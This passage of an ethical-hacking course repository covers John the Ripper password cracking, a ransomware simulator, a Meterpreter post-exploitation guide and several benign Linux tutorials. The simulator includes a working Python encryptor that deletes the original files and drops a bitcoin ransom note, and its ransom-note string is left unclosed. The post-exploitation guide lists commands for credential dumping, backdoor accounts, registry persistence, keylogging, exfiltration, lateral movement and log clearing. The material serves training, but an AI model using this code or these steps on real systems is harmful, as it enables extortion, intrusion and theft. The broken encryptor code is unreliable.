./configure && make -s clean && make -sj4 22 | ``` 23 | - Installing on Windows (using Cygwin) 24 | - Installing on macOS (via Homebrew): 25 | ```bash 26 | brew install john 27 | ``` 28 | - Verifying installation: 29 | ```bash 30 | john --help 31 | ``` 32 | 33 | --- 34 | 35 | ## **Module 2: Understanding Hashes** 36 | ### **2.1 Types of Hashes** 37 | - Common password hash formats: 38 | - **MD5** (`$1$`) 39 | - **SHA-256** (`$5$`) 40 | - **SHA-512** (`$6$`) 41 | - **bcrypt** (`$2a$`) 42 | - **NTLM** (`Windows hashes`) 43 | - **LM** (legacy Windows hashes) 44 | 45 | ### **2.2 Identifying Hashes** 46 | - Using JtR to identify hash types: 47 | ```bash 48 | john --list=formats 49 | ``` 50 | - Using the `hashid` or `hash-identifier` tool: 51 | ```bash 52 | hashid 53 | ``` 54 | 55 | --- 56 | 57 | ## **Module 3: Cracking Hashes with John the Ripper** 58 | ### **3.1 Basic Cracking** 59 | - Cracking a single hash: 60 | ```bash 61 | john --format= --wordlist= 62 | ``` 63 | Example: 64 | ```bash 65 | john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 66 | ``` 67 | 68 | - Cracking multiple hashes: 69 | ```bash 70 | john hashes.txt 71 | ``` 72 | 73 | ### **3.2 Brute Force Attacks** 74 | - Using brute force (incremental mode): 75 | ```bash 76 | john --incremental hash.txt 77 | ``` 78 | - Specifying character sets: 79 | ```bash 80 | john --incremental=digits hash.txt 81 | ``` 82 | 83 | ### **3.3 Dictionary Attacks** 84 | - Using a wordlist: 85 | ```bash 86 | john --wordlist=/path/to/wordlist.txt hash.txt 87 | ``` 88 | - Common wordlists: 89 | - **RockYou** (`/usr/share/wordlists/rockyou.txt`) 90 | - **SecLists** (GitHub repository with various wordlists) 91 | 92 | ### **3.4 Mask Attacks (Optimized Brute Force)** 93 | - Using custom masks: 94 | ```bash 95 | john --mask=?l?l?l?l?l?l?l hash.txt 96 | ``` 97 | - `?l` = lowercase letters 98 | - `?u` = uppercase letters 99 | - `?d` = digits 100 | - `?s` = special characters 101 | 102 | ### **3.5 Rules-Based Attacks** 103 | - Using pre-defined rule sets: 104 | ```bash 105 | john --wordlist=rockyou.txt --rules hash.txt 106 | ``` 107 | 108 | --- 109 | 110 | ## **Module 4: Cracking Windows Passwords** 111 | ### **4.1 Extracting Windows Hashes** 112 | - Dumping NTLM hashes using `samdump2`: 113 | ```bash 114 | samdump2 SYSTEM SAM > hashes.txt 115 | ``` 116 | - Using `mimikatz` or `pwdump` tools 117 | 118 | ### **4.2 Cracking NTLM Hashes** 119 | - Running JtR on NTLM hashes: 120 | ```bash 121 | john --format=nt hash.txt 122 | ``` 123 | 124 | --- 125 | 126 | ## **Module 5: Advanced Techniques** 127 | ### **5.1 Cracking Online Passwords** 128 | - Cracking SSH password hashes 129 | - Capturing and cracking WPA2 Wi-Fi passwords 130 | - Cracking ZIP file passwords: 131 | ```bash 132 | zip2john protected.zip > hash.txt 133 | john hash.txt 134 | ``` 135 | 136 | ### **5.2 Using External Tools with John** 137 | - Using `hashcat` alongside JtR 138 | - Combining JtR with Hydra for online attacks 139 | 140 | ### **5.3 Customizing JtR** 141 | - Writing custom rule files (`john.conf`) 142 | - Optimizing performance with OpenMP 143 | -------------------------------------------------------------------------------- /Ransomware-Project(groupC).md: -------------------------------------------------------------------------------- 1 | # Webdeves Ethical Hacking Project 2 | # Ransomware Simulator Project (Ethical Hacking Lab) 3 | 4 | ## Objective 5 | Simulate a ransomware attack in a controlled environment to understand how file encryption and ransom messages work. 6 | 7 | ## Project Structure 8 | ``` 9 | ransomware_simulator/ 10 | │ 11 | ├── encryptor.py # Script to encrypt files and drop ransom note 12 | ├── decryptor.py # Script to decrypt files with a key 13 | ├── key.key # Generated encryption key 14 | ├── ransom_note.txt # Template ransom message (used in script) 15 | ├── demo_files/ # Test files that will be encrypted 16 | └── README.md # Instructions and documentation 17 | ``` 18 | 19 | - Only run this in **virtual machines**. 20 | - Use only the `demo_files/` folder with dummy/test files. 21 | - Never target system folders or real documents. 22 | - Understand the legal and ethical implications before testing. 23 | 24 | 25 | ## Getting Started 26 | 27 | ### Step 1: Setup Environment 28 | - Python 3.7+ 29 | - Install dependencies: 30 | ```bash 31 | pip install cryptography 32 | ``` 33 | - Create test files in `demo_files/` folder (e.g. `.txt`, `.docx`, `.jpg`) 34 | 35 | ### Step 2: Run Encryptor 36 | ```bash 37 | python encryptor.py 38 | ``` 39 | This will: 40 | - Encrypt all files in `demo_files/` 41 | - Replace originals with `.enc` files 42 | - Create a ransom note called `README.txt` 43 | 44 | ### Step 3: Decryption 45 | You’ll use the `decryptor.py` script and the `key.key` file to recover the original files. This will simulate what happens when a victim "pays the ransom". 46 | 47 | 48 | 49 | ## decryptor.py (To be added) 50 | You will load: 51 | - Load the `key.key` 52 | - Decrypt each `.enc` file in the folder 53 | - Recreate the original files 54 | 55 | ## Learning Outcomes 56 | - Understand how ransomware operates 57 | - Learn file encryption/decryption using `cryptography` 58 | - Explore defense mechanisms and detection strategies 59 | - Discuss ethical and legal implications of malware simulation 60 | 61 | 62 | 63 | ## Extension Ideas 64 | - Add a GUI popup with countdown timer 65 | - Simulate file extension hiding 66 | - Add basic persistence (autostart simulation) 67 | - Build a basic ransomware detector script (blue team exercise) 68 | 69 | 70 | 71 | ## Submission Checklist 72 | - [ ] `encryptor.py` script completed 73 | - [ ] `decryptor.py` script created 74 | - [ ] Test run and screenshot of encrypted files 75 | - [ ] Report (1 page): What you learned + detection methods 76 | 77 | 78 | 79 | ## Ethics Reminder 80 | This project is for educational cybersecurity use only. Misusing this knowledge is illegal and unethical. Respect privacy, security, and laws at all times. 81 | 82 | ## encryptor.py 83 | 84 | ```Python 85 | from cryptography.fernet import Fernet 86 | import os, glob 87 | 88 | # Create and store encryption key 89 | key = Fernet.generate_key() 90 | with open("key.key", "wb") as f: 91 | f.write(key) 92 | 93 | fernet = Fernet(key) 94 | 95 | # Folder containing files to simulate encryption 96 | folder = "demo_files/" 97 | os.makedirs(folder, exist_ok=True) 98 | 99 | # Encrypt all files in folder 100 | for filepath in glob.glob(folder + "*"): 101 | if filepath.endswith(".enc") or filepath.endswith("README.txt"): 102 | continue 103 | with open(filepath, "rb") as f: 104 | data = f.read() 105 | encrypted = fernet.encrypt(data) 106 | with open(filepath + ".enc", "wb") as f: 107 | f.write(encrypted) 108 | os.remove(filepath) 109 | 110 | # Drop ransom note 111 | ransom_note = """ 112 | --- YOUR FILES HAVE BEEN ENCRYPTED --- 113 | To recover your data, send 1 BTC to the following address: 114 | 1A2b3C4d5E6f7G8h9I0j 115 | Then contact us with proof of payment. 116 | You have 48 hours before your files are lost forever. 117 | 118 | python 119 | with open(folder + "README.txt", "w") as f: 120 | f.write(ransom_note) 121 | 122 | print("[+] Files encrypted. Ransom note dropped.") 123 | ``` 124 | -------------------------------------------------------------------------------- /projects/post-exploitation.md: -------------------------------------------------------------------------------- 1 | Once you have gained access to a Windows machine using Metasploit and Meterpreter, post-exploitation involves leveraging that access to extract information, escalate privileges, maintain persistence, and move laterally within the network. 2 | 3 | ### **1. Gaining Access to a Windows System** 4 | Before post-exploitation, you need an active Meterpreter session, typically obtained using: 5 | - Exploiting a vulnerability (e.g., MS17-010 EternalBlue) 6 | - Using a malicious payload (e.g., `windows/meterpreter/reverse_tcp`) 7 | - Social engineering (e.g., phishing, malicious USB drop) 8 | 9 | To check active sessions: 10 | ```bash 11 | msfconsole 12 | sessions -l 13 | ``` 14 | To interact with a session: 15 | ```bash 16 | sessions -i 17 | ``` 18 | 19 | --- 20 | 21 | ## **Post-Exploitation Techniques** 22 | 23 | ### **2. System Enumeration** 24 | Gather system details: 25 | ```bash 26 | sysinfo 27 | ``` 28 | Get user details: 29 | ```bash 30 | getuid 31 | ``` 32 | List running processes: 33 | ```bash 34 | ps 35 | ``` 36 | Check network interfaces: 37 | ```bash 38 | ifconfig 39 | ``` 40 | Retrieve environment variables: 41 | ```bash 42 | getenv 43 | ``` 44 | Dump credentials (if running as SYSTEM): 45 | ```bash 46 | hashdump 47 | ``` 48 | 49 | --- 50 | 51 | ### **3. Privilege Escalation** 52 | If the current user lacks administrative privileges, escalate using: 53 | ```bash 54 | getsystem 55 | ``` 56 | If `getsystem` fails, try local privilege escalation exploits: 57 | ```bash 58 | use exploit/windows/local/bypassuac 59 | set SESSION 60 | exploit 61 | ``` 62 | Check for misconfigurations that allow privilege escalation: 63 | ```bash 64 | load incognito 65 | list_tokens -u 66 | impersonate_token "NT AUTHORITY\SYSTEM" 67 | ``` 68 | 69 | --- 70 | 71 | ### **4. Maintaining Persistence** 72 | #### **Method 1: Creating a New User** 73 | ```bash 74 | execute -f cmd.exe -i -H 75 | net user hacker P@ssw0rd /add 76 | net localgroup administrators hacker /add 77 | ``` 78 | 79 | #### **Method 2: Registry Persistence** 80 | Add a registry entry to auto-start Meterpreter: 81 | ```bash 82 | reg setval -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v backdoor -d "C:\\Users\\Public\\backdoor.exe" 83 | ``` 84 | 85 | #### **Method 3: Service Persistence** 86 | ```bash 87 | run persistence -X -i 30 -p 4444 -r 88 | ``` 89 | 90 | --- 91 | 92 | ### **5. Credential Dumping** 93 | Extract stored credentials using Mimikatz: 94 | ```bash 95 | load mimikatz 96 | wdigest 97 | kerberos 98 | ``` 99 | Dump credentials from LSASS: 100 | ```bash 101 | run post/windows/gather/credentials/mimikatz 102 | ``` 103 | 104 | --- 105 | 106 | ### **6. Capturing Keystrokes** 107 | ```bash 108 | keyscan_start 109 | ``` 110 | To view captured keystrokes: 111 | ```bash 112 | keyscan_dump 113 | ``` 114 | Stop keylogging: 115 | ```bash 116 | keyscan_stop 117 | ``` 118 | 119 | --- 120 | 121 | ### **7. Capturing Screenshots** 122 | ```bash 123 | screenshot 124 | ``` 125 | 126 | --- 127 | 128 | ### **8. Exfiltrating Files** 129 | Download a file from the target: 130 | ```bash 131 | download C:\\Users\\victim\\Desktop\\passwords.txt 132 | ``` 133 | Upload a file: 134 | ```bash 135 | upload backdoor.exe C:\\Users\\Public\\backdoor.exe 136 | ``` 137 | 138 | --- 139 | 140 | ### **9. Lateral Movement** 141 | Pivot to another machine using a captured credential: 142 | ```bash 143 | use exploit/windows/smb/psexec 144 | set RHOST 145 | set SMBUser 146 | set SMBPass 147 | exploit 148 | ``` 149 | 150 | --- 151 | 152 | ### **10. Clearing Tracks** 153 | Delete event logs: 154 | ```bash 155 | clearev 156 | ``` 157 | Remove history: 158 | ```bash 159 | rm -rf C:\\Windows\\Prefetch\\* 160 | ``` 161 | 162 | --- 163 | 164 | ## **Defensive Measures** 165 | Organizations can mitigate these attacks by: 166 | - Applying patches (e.g., disable SMBv1) 167 | - Using endpoint protection (EDR/XDR) 168 | - Enabling Windows Defender Attack Surface Reduction (ASR) 169 | - Implementing least privilege access 170 | - Monitoring logs and PowerShell activity 171 | -------------------------------------------------------------------------------- /shell_week/weekly_audit_report.md: -------------------------------------------------------------------------------- 1 | ## Project: Weekly Audit Report Generator 2 | 3 | ### **Goal:** 4 | 5 | Create a **Bash script** that: 6 | 7 | * Runs a security audit 8 | * Saves the results to `/var/log/security-audit.log` 9 | * Is scheduled to run **weekly** via cron 10 | 11 | 12 | 13 | ## Step-by-Step Guide 14 | 15 | 16 | 17 | ### **Step 1: Script Outline** 18 | 19 | Create a file named: 20 | 21 | ```bash 22 | sudo nano /usr/local/bin/weekly-audit.sh 23 | ``` 24 | 25 | Add the following shebang line: 26 | 27 | ```bash 28 | #!/bin/bash 29 | ``` 30 | 31 | 32 | 33 | ### **Step 2: Create Log Directory & File** 34 | 35 | Add this to the top of the script to define the log file path: 36 | 37 | ```bash 38 | LOGFILE="/var/log/security-audit.log" 39 | DATE=$(date '+%Y-%m-%d %H:%M:%S') 40 | 41 | echo "===== Security Audit Report - $DATE =====" >> "$LOGFILE" 42 | ``` 43 | 44 | 45 | 46 | ### **Step 3: Check Open Ports** 47 | 48 | Use `ss`, `netstat`, or `nmap` (choose based on availability): 49 | 50 | ```bash 51 | echo -e "\n[Open Ports - ss]" >> "$LOGFILE" 52 | ss -tuln >> "$LOGFILE" 2>/dev/null 53 | 54 | # Optional: if nmap is installed 55 | # echo -e "\n[Open Ports - nmap]" >> "$LOGFILE" 56 | # nmap -sT -O localhost >> "$LOGFILE" 2>/dev/null 57 | ``` 58 | 59 | 60 | 61 | ### **Step 4: List Users with UID 0 (Superusers)** 62 | 63 | ```bash 64 | echo -e "\n[Users with UID 0]" >> "$LOGFILE" 65 | awk -F: '($3 == 0) {print $1}' /etc/passwd >> "$LOGFILE" 66 | ``` 67 | 68 | --- 69 | 70 | ### **Step 5: Find SUID and SGID Files** 71 | 72 | ```bash 73 | echo -e "\n[SUID Files]" >> "$LOGFILE" 74 | find / -perm -4000 -type f -exec ls -lh {} \; 2>/dev/null | awk '{print $NF}' >> "$LOGFILE" 75 | 76 | echo -e "\n[SGID Files]" >> "$LOGFILE" 77 | find / -perm -2000 -type f -exec ls -lh {} \; 2>/dev/null | awk '{print $NF}' >> "$LOGFILE" 78 | ``` 79 | 80 | --- 81 | 82 | ### **Step 6: Add Summary and End** 83 | 84 | ```bash 85 | echo -e "\n[Summary]" >> "$LOGFILE" 86 | echo "Audit completed on $DATE" >> "$LOGFILE" 87 | echo "==========================================" >> "$LOGFILE" 88 | ``` 89 | 90 | --- 91 | 92 | ### **Step 7: Make the Script Executable** 93 | 94 | ```bash 95 | sudo chmod +x /usr/local/bin/weekly-audit.sh 96 | ``` 97 | 98 | --- 99 | 100 | ## 📆 Step 8: Schedule the Script with Cron (Weekly) 101 | 102 | Open the root user's crontab: 103 | 104 | ```bash 105 | sudo crontab -e 106 | ``` 107 | 108 | Add the following line to run every Sunday at 2 AM: 109 | 110 | ```bash 111 | 0 2 * * 0 /usr/local/bin/weekly-audit.sh 112 | ``` 113 | 114 | --- 115 | 116 | ## 🔐 Step 9: Set Permissions (Secure the Log) 117 | 118 | Make sure only root can read the log: 119 | 120 | ```bash 121 | sudo touch /var/log/security-audit.log 122 | sudo chown root:root /var/log/security-audit.log 123 | sudo chmod 600 /var/log/security-audit.log 124 | ``` 125 | 126 | --- 127 | 128 | ## ✅ Optional: Email Report (Bonus) 129 | 130 | If your system has `mail` installed and configured: 131 | 132 | ```bash 133 | mail -s "Weekly Security Audit Report" you@example.com < /var/log/security-audit.log 134 | ``` 135 | 136 | --- 137 | 138 | ## 📁 Full Script Summary 139 | 140 | Here's the complete version: 141 | 142 | ```bash 143 | #!/bin/bash 144 | LOGFILE="/var/log/security-audit.log" 145 | DATE=$(date '+%Y-%m-%d %H:%M:%S') 146 | 147 | echo "===== Security Audit Report - $DATE =====" >> "$LOGFILE" 148 | 149 | echo -e "\n[Open Ports - ss]" >> "$LOGFILE" 150 | ss -tuln >> "$LOGFILE" 2>/dev/null 151 | 152 | echo -e "\n[Users with UID 0]" >> "$LOGFILE" 153 | awk -F: '($3 == 0) {print $1}' /etc/passwd >> "$LOGFILE" 154 | 155 | echo -e "\n[SUID Files]" >> "$LOGFILE" 156 | find / -perm -4000 -type f -exec ls -lh {} \; 2>/dev/null | awk '{print $NF}' >> "$LOGFILE" 157 | 158 | echo -e "\n[SGID Files]" >> "$LOGFILE" 159 | find / -perm -2000 -type f -exec ls -lh {} \; 2>/dev/null | awk '{print $NF}' >> "$LOGFILE" 160 | 161 | echo -e "\n[Summary]" >> "$LOGFILE" 162 | echo "Audit completed on $DATE" >> "$LOGFILE" 163 | echo "==========================================" >> "$LOGFILE" 164 | ``` 165 | 166 | 167 | -------------------------------------------------------------------------------- /week2/day2_tcp.md: -------------------------------------------------------------------------------- 1 | ### **Understanding TCP/IP in Linux** 2 | 3 | The **TCP/IP (Transmission Control Protocol/Internet Protocol)** suite is the foundation of internet communications. 4 | It defines the standards and protocols that allow devices to connect, exchange data, and communicate over networks. In Linux, 5 | TCP/IP networking is a core functionality that enables seamless connectivity and data transmission. 6 | 7 | --- 8 | 9 | ### **Why is TCP/IP Important in Linux?** 10 | 1. **Data Communication**: Facilitates reliable data transfer between systems. 11 | 2. **Networking Basics**: Forms the basis for local and global communication over the internet or intranet. 12 | 3. **Interoperability**: Allows Linux systems to interact with other platforms like Windows and macOS. 13 | 4. **Troubleshooting**: Understanding TCP/IP helps in diagnosing and fixing network issues. 14 | 15 | --- 16 | 17 | ### **The TCP/IP Model and Its Layers** 18 | 19 | The TCP/IP model is organized into four layers, each with distinct responsibilities: 20 | 21 | 1. **Network Interface Layer** 22 | - Handles physical and data link communication with hardware (e.g., Ethernet, Wi-Fi). 23 | - Examples: Device drivers, network adapters. 24 | 25 | 2. **Internet Layer** 26 | - Manages IP addressing, routing, and packet forwarding. 27 | - Protocols: **IP (IPv4/IPv6), ICMP, ARP**. 28 | 29 | 3. **Transport Layer** 30 | - Ensures reliable data transfer between systems using protocols like: 31 | - **TCP (Transmission Control Protocol)**: Reliable, connection-oriented. 32 | - **UDP (User Datagram Protocol)**: Unreliable, connectionless. 33 | - Ensures data is delivered in order and without errors. 34 | 35 | 4. **Application Layer** 36 | - Provides services and protocols for end-user applications. 37 | - Examples: HTTP, FTP, SMTP, DNS. 38 | 39 | --- 40 | 41 | ### **Basic Linux TCP/IP Commands** 42 | 43 | 1. **View Active TCP/IP Connections** 44 | ```bash 45 | netstat -at 46 | ``` 47 | - Lists all active TCP connections. 48 | - **Alternative** (modern): 49 | ```bash 50 | ss -at 51 | ``` 52 | 53 | 2. **Check IP Configuration** 54 | ```bash 55 | ip addr 56 | ``` 57 | - Displays IP addresses assigned to network interfaces. 58 | - **Alternative**: 59 | ```bash 60 | ifconfig 61 | ``` 62 | 63 | 3. **Test Connectivity** 64 | ```bash 65 | ping [hostname or IP] 66 | ``` 67 | - Checks if a remote host is reachable. 68 | 69 | 4. **Trace Route of Packets** 70 | ```bash 71 | traceroute [hostname or IP] 72 | ``` 73 | - Tracks the path packets take to a destination. 74 | 75 | 5. **View Routing Table** 76 | ```bash 77 | ip route 78 | ``` 79 | - Displays network routes and gateways. 80 | 81 | 6. **Send/Receive Data** 82 | - Using `curl` or `wget` to interact with servers over HTTP/HTTPS: 83 | ```bash 84 | curl https://example.com 85 | wget https://example.com 86 | ``` 87 | 88 | --- 89 | 90 | ### **Practical Example: Using TCP/IP Commands** 91 | 92 | 1. **Check Open Ports Using `netstat`**: 93 | ```bash 94 | netstat -tuln 95 | ``` 96 | - Displays TCP and UDP listening ports along with process IDs. 97 | 98 | 2. **Diagnose Connectivity with `ping`**: 99 | ```bash 100 | ping google.com 101 | ``` 102 | - Sends packets to `google.com` and checks if it responds. 103 | 104 | 3. **Monitor Network Traffic Using `tcpdump`**: 105 | ```bash 106 | sudo tcpdump -i eth0 107 | ``` 108 | - Captures and displays TCP/IP packets on a specific interface. 109 | 110 | --- 111 | 112 | ### **Why Master TCP/IP in Linux?** 113 | - **Networking Proficiency**: Helps in configuring and managing Linux servers. 114 | - **Troubleshooting Skills**: Identifying network issues becomes straightforward. 115 | - **Secure Systems**: Better understanding of protocols like TCP/IP aids in securing Linux systems. 116 | 117 | Mastering TCP/IP on Linux equips you with the skills needed to handle complex networking tasks, ensuring smooth communication and system management. 118 | -------------------------------------------------------------------------------- /week3/redirect_shell.md: -------------------------------------------------------------------------------- 1 | # **Redirection in Shell Basics** 2 | 3 | In **Linux**, redirection allows you to **control where input comes from and where output goes**. By default, a command takes input from the keyboard and outputs to the terminal. However, we can **redirect** this input and output to files or other commands. 4 | 5 | --- 6 | 7 | ## **1. Understanding Input & Output Streams** 8 | Every process in Linux has three standard data streams: 9 | 10 | | **Stream** | **Description** | **File Descriptor** | **Default Destination** | 11 | |------------|----------------|---------------------|-------------------------| 12 | | **Standard Input (stdin)** | Input to a command | `0` | Keyboard | 13 | | **Standard Output (stdout)** | Normal output from a command | `1` | Terminal (screen) | 14 | | **Standard Error (stderr)** | Error messages | `2` | Terminal (screen) | 15 | 16 | --- 17 | 18 | ## **2. Output Redirection (`>` and `>>`)** 19 | ### **a. Redirecting Standard Output (`>`)** 20 | Redirects output to a file, **overwriting** if the file exists. 21 | 22 | #### **Example:** 23 | ```bash 24 | ls > files.txt 25 | ``` 26 | - This stores the output of `ls` in `files.txt`, **overwriting** any previous content. 27 | 28 | #### **Verify by reading the file:** 29 | ```bash 30 | cat files.txt 31 | ``` 32 | 33 | --- 34 | 35 | ### **b. Appending Output (`>>`)** 36 | Redirects output to a file, but **appends** instead of overwriting. 37 | 38 | #### **Example:** 39 | ```bash 40 | echo "New line added" >> files.txt 41 | ``` 42 | - This **adds** `"New line added"` to `files.txt` without removing existing content. 43 | 44 | > **Activity:** Try using `>` and `>>` to see the difference. 45 | 46 | --- 47 | 48 | ## **3. Input Redirection (`<`)** 49 | Redirects a file’s content as input to a command. 50 | 51 | #### **Example:** 52 | ```bash 53 | sort < files.txt 54 | ``` 55 | - The `sort` command reads **input from `files.txt`** instead of the keyboard. 56 | 57 | > **Activity:** Create a file with multiple lines, then use `sort < filename` to sort its contents. 58 | 59 | --- 60 | 61 | ## **4. Redirecting Error Messages (`2>` and `2>>`)** 62 | ### **a. Redirecting Errors (`2>`)** 63 | Redirects **stderr** to a file, overwriting it. 64 | 65 | #### **Example:** 66 | ```bash 67 | ls /wrongpath 2> error.log 68 | ``` 69 | - Any error messages from `ls /wrongpath` go into `error.log`. 70 | 71 | --- 72 | 73 | ### **b. Appending Errors (`2>>`)** 74 | Appends error messages instead of overwriting. 75 | 76 | #### **Example:** 77 | ```bash 78 | ls /anotherwrongpath 2>> error.log 79 | ``` 80 | - Errors from `ls /anotherwrongpath` are **added** to `error.log`. 81 | 82 | > **Activity:** Try running commands that produce errors and redirect them. 83 | 84 | --- 85 | 86 | ## **5. Redirecting Both Output & Errors (`&>` and `2>&1`)** 87 | ### **a. Redirecting Both (`&>`)** 88 | Redirects **stdout and stderr** to the same file. 89 | 90 | #### **Example:** 91 | ```bash 92 | ls /correct /wrongpath &> output.log 93 | ``` 94 | 95 | --- 96 | 97 | ### **b. Redirecting Errors to Standard Output (`2>&1`)** 98 | Redirects stderr (`2`) to stdout (`1`), then redirects everything to a file. 99 | 100 | #### **Example:** 101 | ```bash 102 | ls /correct /wrongpath > output.log 2>&1 103 | ``` 104 | 105 | > **Activity:** Experiment with `&>` and `2>&1` to see how errors and output are handled. 106 | 107 | --- 108 | 109 | ## **6. Piping (`|`) - Redirecting Output to Another Command** 110 | Pipes (`|`) send output from one command as input to another. 111 | 112 | #### **Example:** 113 | ```bash 114 | ls | grep ".txt" 115 | ``` 116 | - The `ls` command lists files, and `grep` filters `.txt` files. 117 | 118 | > **Activity:** Try `ps aux | grep bash` to find all running Bash processes. 119 | 120 | --- 121 | 122 | ## **7. Null Redirection (`/dev/null`) - Discarding Output** 123 | `/dev/null` is a special file that **discards** anything written to it. 124 | 125 | #### **Example:** 126 | ```bash 127 | ls /wrongpath 2> /dev/null 128 | ``` 129 | - Errors are discarded and won’t show up. 130 | 131 | > **Activity:** Try redirecting both stdout and stderr to `/dev/null`. 132 | -------------------------------------------------------------------------------- /week3/shell_basics.md: -------------------------------------------------------------------------------- 1 | ## **1. Understanding the Linux Shell** 2 | The **Linux shell** is a command-line interface (CLI) that allows users to interact with the operating system. It acts as a middleman between the user and the kernel, enabling users to execute commands, automate tasks, and manage files. 3 | 4 | ### **Common Shells in Linux** 5 | | Shell | Description | 6 | |-------|------------| 7 | | **Bourne Shell (sh)** | The original UNIX shell, lightweight and minimal. | 8 | | **C Shell (csh)** | Uses C-like syntax, suitable for programmers. | 9 | | **Korn Shell (ksh)** | An improved version of `sh` with additional scripting features. | 10 | | **Bourne Again Shell (bash)** | The most widely used shell, with many powerful features. | 11 | 12 | > **Activity**: Run `echo $SHELL` in the terminal to check which shell is currently in use. 13 | 14 | --- 15 | 16 | ## **2. Basic Shell Commands** 17 | Here are some essential commands for beginners: 18 | 19 | ### **a. Navigating Directories** 20 | - `pwd` → Print the current working directory. 21 | - `ls` → List files and directories. 22 | - `cd` → Change directories. 23 | 24 | **Example:** 25 | ```bash 26 | pwd 27 | cd /home/user/Documents 28 | ls -l 29 | ``` 30 | 31 | > **Activity**: Create a directory, navigate to it, and check its contents using the commands above. 32 | 33 | --- 34 | 35 | ### **b. File and Directory Management** 36 | | Command | Description | 37 | |---------|------------| 38 | | `mkdir myfolder` | Create a new directory. | 39 | | `rmdir myfolder` | Remove an empty directory. | 40 | | `touch file.txt` | Create a new file. | 41 | | `rm file.txt` | Delete a file. | 42 | | `cp file.txt /tmp/` | Copy a file. | 43 | | `mv file.txt newfile.txt` | Rename (move) a file. | 44 | 45 | > **Activity**: Create, rename, copy, and delete files inside a directory. 46 | 47 | --- 48 | 49 | ### **c. Viewing and Editing Files** 50 | | Command | Description | 51 | |---------|------------| 52 | | `cat file.txt` | View file contents. | 53 | | `nano file.txt` | Open a file in `nano` text editor. | 54 | | `less file.txt` | View large files one page at a time. | 55 | | `head -n 5 file.txt` | View the first 5 lines. | 56 | | `tail -n 5 file.txt` | View the last 5 lines. | 57 | 58 | > **Activity**: Create a text file, add content using `nano`, and view it using `cat`, `less`, and `tail`. 59 | 60 | --- 61 | 62 | ### **d. File Permissions and Ownership** 63 | | Command | Description | 64 | |---------|------------| 65 | | `ls -l` | View file permissions. | 66 | | `chmod 755 file.sh` | Change file permissions. | 67 | | `chown user:group file.sh` | Change file ownership. | 68 | 69 | **Example:** 70 | ```bash 71 | chmod +x script.sh # Give execute permission 72 | ls -l script.sh # Check permissions 73 | ``` 74 | 75 | > **Activity**: Create a script, modify its permissions, and run it. 76 | 77 | --- 78 | 79 | ## **3. Introduction to Linux Scripting** 80 | **Bash scripting** allows users to automate tasks using commands inside a script file. 81 | 82 | **Example Script:** 83 | ```bash 84 | #!/bin/bash 85 | echo "Hello, $(whoami)! Welcome to Linux." 86 | date 87 | ``` 88 | Save this script as `hello.sh`, then run: 89 | ```bash 90 | chmod +x hello.sh 91 | ./hello.sh 92 | ``` 93 | 94 | > **Activity**: Write and execute a simple script that prints "Hello, Linux!" 95 | 96 | --- 97 | 98 | ## **4. Advanced Shell Features** 99 | ### **a. Redirection & Piping** 100 | - `>` → Redirect output to a file. 101 | - `>>` → Append output to a file. 102 | - `|` → Pipe output from one command to another. 103 | 104 | **Example:** 105 | ```bash 106 | ls -l > file_list.txt # Save output to a file 107 | cat file_list.txt | grep ".txt" # Find files with ".txt" in their name 108 | ``` 109 | 110 | > **Activity**: Use redirection and pipes to filter and save command output. 111 | 112 | --- 113 | 114 | ### **b. Process Management** 115 | - `ps` → Show running processes. 116 | - `top` → Monitor system resources. 117 | - `kill ` → Terminate a process. 118 | - `htop` → Interactive process manager (if installed). 119 | 120 | **Example:** 121 | ```bash 122 | ps aux | grep firefox # Find Firefox process 123 | kill # Replace with the actual process ID 124 | ``` 125 | 126 | > **Activity**: List running processes and terminate a selected process. 127 | -------------------------------------------------------------------------------- /week3/super_user.md: -------------------------------------------------------------------------------- 1 | # **Super User in Linux** 2 | 3 | In Linux, the **Super User** (also known as the **root user**) is a special user account with **unrestricted access** to the system. The root user has full control over the operating system, including: 4 | 5 | ✅ **Installing or removing software** 6 | ✅ **Modifying system configurations** 7 | ✅ **Managing user accounts and permissions** 8 | ✅ **Accessing and modifying all files** 9 | ✅ **Changing system settings and kernel parameters** 10 | 11 | --- 12 | 13 | ## **1. Dangers of the Root User** 14 | The **root account** is very powerful, but **misuse** can lead to: 15 | ⚠️ **Accidental deletion of critical system files** 16 | ⚠️ **System crashes due to incorrect configuration changes** 17 | ⚠️ **Security vulnerabilities if used carelessly** 18 | 19 | For this reason, it is recommended to **use root privileges only when necessary**. 20 | 21 | --- 22 | 23 | ## **2. Switching to Super User with `su`** 24 | The `su` (switch user) command allows switching to another user, including root. 25 | 26 | ### **Example: Switching to Root** 27 | ```bash 28 | su 29 | ``` 30 | - You will be asked for the **root password**. 31 | - Once authenticated, you will have a **root shell** (`#` instead of `$`). 32 | 33 | 🔴 **Warning:** When using `su`, all commands will run as root until you exit. 34 | 35 | ### **Switching to Another User** 36 | ```bash 37 | su username 38 | ``` 39 | - This allows switching to another **regular user** instead of root. 40 | 41 | ### **Exit from Root Mode** 42 | To return to a normal user: 43 | ```bash 44 | exit 45 | ``` 46 | 47 | --- 48 | 49 | ## **3. Using `sudo` for Root Privileges** 50 | The `sudo` (superuser do) command allows running **specific** commands as root **without switching users**. 51 | 52 | ### **Example: Running a Command as Root** 53 | ```bash 54 | sudo apt update 55 | sudo systemctl restart apache2 56 | ``` 57 | - It **prompts for your password**, not the root password. 58 | - It **logs** the command usage for security auditing. 59 | 60 | 🔒 **Why Use `sudo` Instead of `su`?** 61 | ✅ More secure (doesn’t give full root access) 62 | ✅ Logs commands for tracking 63 | ✅ Temporary root access 64 | 65 | --- 66 | 67 | ## **4. Granting a User `sudo` Privileges** 68 | To allow a user to use `sudo`, add them to the **sudoers group**. 69 | 70 | ### **Step 1: Add User to Sudo Group** 71 | ```bash 72 | usermod -aG sudo username 73 | ``` 74 | 75 | ### **Step 2: Verify** 76 | ```bash 77 | sudo whoami 78 | ``` 79 | **Output:** 80 | ``` 81 | root 82 | ``` 83 | This confirms the user can run commands as root. 84 | 85 | --- 86 | 87 | ## **5. Running a Shell as Root (`sudo -i` or `sudo su`)** 88 | ### **Open an Interactive Root Shell** 89 | ```bash 90 | sudo -i 91 | ``` 92 | or 93 | ```bash 94 | sudo su 95 | ``` 96 | - This gives a **persistent** root shell (`#` prompt). 97 | - **Dangerous** if commands are misused. 98 | 99 | To exit: 100 | ```bash 101 | exit 102 | ``` 103 | 104 | --- 105 | 106 | ## **6. Editing the `sudoers` File (Advanced)** 107 | The **`/etc/sudoers`** file defines 